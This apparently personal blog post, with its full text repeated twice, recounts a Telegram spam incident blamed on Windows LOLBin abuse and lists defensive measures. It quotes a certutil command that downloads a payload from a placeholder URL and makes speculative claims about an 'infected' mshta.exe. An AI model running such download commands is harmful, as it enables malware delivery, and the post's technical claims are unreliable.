Tweet
The other day, something happened that rarely happens to me.
Suddenly I received 200 or more messages with the same content on Telegram, some sceenshot with an advertisement, supposedly Elon Musk is offering something for free, like "hurry up before it's too late and while supplies last"... trollala.
To make matters worse, most of my contacts in the list also received the same message from me?! Even though I didn't send anything to anyone!?
I immediately suspected some virus, adware or some similar malicious software.
I decided to do a detailed inspection of the problem.
Let me say right away that none of the aggressively advertised anti-virus programs FOUND ANYTHING CONTROVERSIALLY BAD IN THE SYSTEM!?
Hmmm... this is starting to intrigue me more and more and "peess" me off more and more.
And then everything started to unravel and after ten hours I discovered everything.
First: Telegram was heavily attacked by some hackers that day.
I will not go into details, my assumption is that it is a strictly political matter and I would prefer to wash my hands of it. I am not interested in such things.
Second, the attack "opened the door" and abused all the known (and more unknown, unpublished) vulnerabilities of the Windows system.
And the most banal but also the most fatal thing that can happen to the system happened.
With "very well protected systems" the biggest vulnerability is in "trivial details" that no one suspects.
LOLBINs = Legitimate Windows tools (like powershell.exe) abused by hackers to do bad things (download malware, run code, evade detection).
Key points:
Built-in Windows programs, not viruses.
Hard to block because they're trusted by the system.
Example abuse: certutil.exe -urlcache -f <malicious_url> payload.exe
In particular, a very trivial and benign file "mshta.exe" that exists in two folders in the system: System32 and SysWow... was attacked and infected in my system.
mshta.exe is legitimate Microsoft tool for running .hta (HTML Application) files.
Abused as a LOLBin to execute malicious scripts (JavaScript/VBScript) directly from command line or URLs, often evading application whitelists.
What does this have to do with the attack on Telegram? I wouldn't know. But the processes happened simultaneously and in the same period.
Treating that file is pointless. Windows protects it very well even while the system is active; you can't do anything to it and that file does damage unhindered.
One of the solutions (not 100% sure) is to remove the hard disk and connect it to another computer as "external media" and then you can manipulate those LOLBINS files, delete, replace, etc.
However, I'm not sure (nobody is) to what extent the system is compromised and how deeply the problem has gone into the system.
So, as always, I resorted to Solomon's solution, I formatted the drive, wiped everything and installed a new system. Fortunately, I do regular backups, so there was no damage.
I completely removed Telegram from the system and I don't use it anymore (maybe that was the goal of the hacker), it will be on ice for some time at my place, until I hear that Telegram is safe again.
But how to protect yourself from such nonsense in the future?
Very simple! I don't know why they didn't do it in MS in the first place.
First I created a list of all LOLBINS on the system. And then I created a separate inbound rule for each of them, each with specific criteria, depending on the purpose and nature of the file.
But; LOLBIN abuse is a consequence of already achieved code execution. The Telegram attack was the trigger.
Therefore, I had to take additional measures:
AppLocker / Windows Defender Application Control = allow only known/signed applications.
EDR (Endpoint Detection & Response) = detect anomalies in process behavior.
Restrictive GPOs = disable scripting for regular users.
Network segmentation = limit the communication of critical systems... and this is the crucial part.
And in the end, there remains one very simple solution; after system reinstallation; you simply stop using the application that is currently in trouble and that introduced the problem to the system.
With most software of a different nature this can be a problem, why would I give up using Corel for example?
But with the type of software such as messengers; this is not a problem.
There are "a million" of them. They are all more or less the same.
You give up one and accept the other. But you restrict it well so that it cannot do anything in the system.
I believe that my solution will not be ideal for many, but it is for me. The reason for this is the specific use of the computer and the system on it. "Preferences" is the right word.
Suddenly I received 200 or more messages with the same content on Telegram, some sceenshot with an advertisement, supposedly Elon Musk is offering something for free, like "hurry up before it's too late and while supplies last"... trollala.
To make matters worse, most of my contacts in the list also received the same message from me?! Even though I didn't send anything to anyone!?
I immediately suspected some virus, adware or some similar malicious software.
I decided to do a detailed inspection of the problem.
Let me say right away that none of the aggressively advertised anti-virus programs FOUND ANYTHING CONTROVERSIALLY BAD IN THE SYSTEM!?
Hmmm... this is starting to intrigue me more and more and "peess" me off more and more.
And then everything started to unravel and after ten hours I discovered everything.
First: Telegram was heavily attacked by some hackers that day.
I will not go into details, my assumption is that it is a strictly political matter and I would prefer to wash my hands of it. I am not interested in such things.
Second, the attack "opened the door" and abused all the known (and more unknown, unpublished) vulnerabilities of the Windows system.
And the most banal but also the most fatal thing that can happen to the system happened.
With "very well protected systems" the biggest vulnerability is in "trivial details" that no one suspects.
LOLBINs = Legitimate Windows tools (like powershell.exe) abused by hackers to do bad things (download malware, run code, evade detection).
Key points:
Built-in Windows programs, not viruses.
Hard to block because they're trusted by the system.
Example abuse: certutil.exe -urlcache -f <malicious_url> payload.exe
In particular, a very trivial and benign file "mshta.exe" that exists in two folders in the system: System32 and SysWow... was attacked and infected in my system.
mshta.exe is legitimate Microsoft tool for running .hta (HTML Application) files.
Abused as a LOLBin to execute malicious scripts (JavaScript/VBScript) directly from command line or URLs, often evading application whitelists.
What does this have to do with the attack on Telegram? I wouldn't know. But the processes happened simultaneously and in the same period.
Treating that file is pointless. Windows protects it very well even while the system is active; you can't do anything to it and that file does damage unhindered.
One of the solutions (not 100% sure) is to remove the hard disk and connect it to another computer as "external media" and then you can manipulate those LOLBINS files, delete, replace, etc.
However, I'm not sure (nobody is) to what extent the system is compromised and how deeply the problem has gone into the system.
So, as always, I resorted to Solomon's solution, I formatted the drive, wiped everything and installed a new system. Fortunately, I do regular backups, so there was no damage.
I completely removed Telegram from the system and I don't use it anymore (maybe that was the goal of the hacker), it will be on ice for some time at my place, until I hear that Telegram is safe again.
But how to protect yourself from such nonsense in the future?
Very simple! I don't know why they didn't do it in MS in the first place.
First I created a list of all LOLBINS on the system. And then I created a separate inbound rule for each of them, each with specific criteria, depending on the purpose and nature of the file.
But; LOLBIN abuse is a consequence of already achieved code execution. The Telegram attack was the trigger.
Therefore, I had to take additional measures:
AppLocker / Windows Defender Application Control = allow only known/signed applications.
EDR (Endpoint Detection & Response) = detect anomalies in process behavior.
Restrictive GPOs = disable scripting for regular users.
Network segmentation = limit the communication of critical systems... and this is the crucial part.
And in the end, there remains one very simple solution; after system reinstallation; you simply stop using the application that is currently in trouble and that introduced the problem to the system.
With most software of a different nature this can be a problem, why would I give up using Corel for example?
But with the type of software such as messengers; this is not a problem.
There are "a million" of them. They are all more or less the same.
You give up one and accept the other. But you restrict it well so that it cannot do anything in the system.
I believe that my solution will not be ideal for many, but it is for me. The reason for this is the specific use of the computer and the system on it. "Preferences" is the right word.
.
Comment